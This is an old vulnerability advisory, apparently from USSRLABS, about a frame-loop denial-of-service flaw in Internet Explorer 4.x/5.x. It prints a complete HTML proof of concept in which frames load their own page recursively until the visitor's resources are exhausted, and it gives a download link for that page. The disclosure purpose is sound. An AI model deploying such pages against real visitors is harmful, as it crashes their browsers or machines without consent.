Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability

PROBLEM:

It is possible to create a malicious webpage that when visited by an IE user
all of their system resources are devoured and depending on the system its
possible that the machine can even crash and reboot itself.

The reason you can use up all of the client's resources is by creating an
endless loop of frames. You create a html file that has a few frames inside
it and then link those frames back to the same html file so every time IE
loads the new frame it loads another new frame and another etc... until
after a short time your resources are all used up and your system crashes.

We understand this is somewhat of a nuisance hole but still something that
needs to be addressed.

Example:

-----------readme.htm------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<head>
<title>Ussrlabs is getting hard</title>
</head>
<frameset framespacing="2" frameborder="no" rows="65,*">
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
  <noframes>
  <body bgcolor="#FFFFFF">
  <p>This web page uses frames, but your browser doesn't support them.</p>
  </body>
  </noframes>
</frameset>
<frameset>
  <noframes>
  </noframes>
</frameset>
</html>
-----------readme.htm------------

Or if you want the html can be downloaded here.

http://www.ussrback.com/iehole/readme.zip

Note: It also affect Microsoft FrontPage.


Vendor Status:
Contacted.
"We talked to MS and they said this is a nuisance attack and do not think
its a security hole. So you will not be getting a patch for this(maybe).
However, it is good to know that Netscape Navigator is not affected by this
hole."

Vendor Url: http://www.microsoft.com/

Program Url: http://www.microsoft.com/windows/ie/default.htm

Credit:
USSRLABS

SOLUTION:
Nothing yet.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com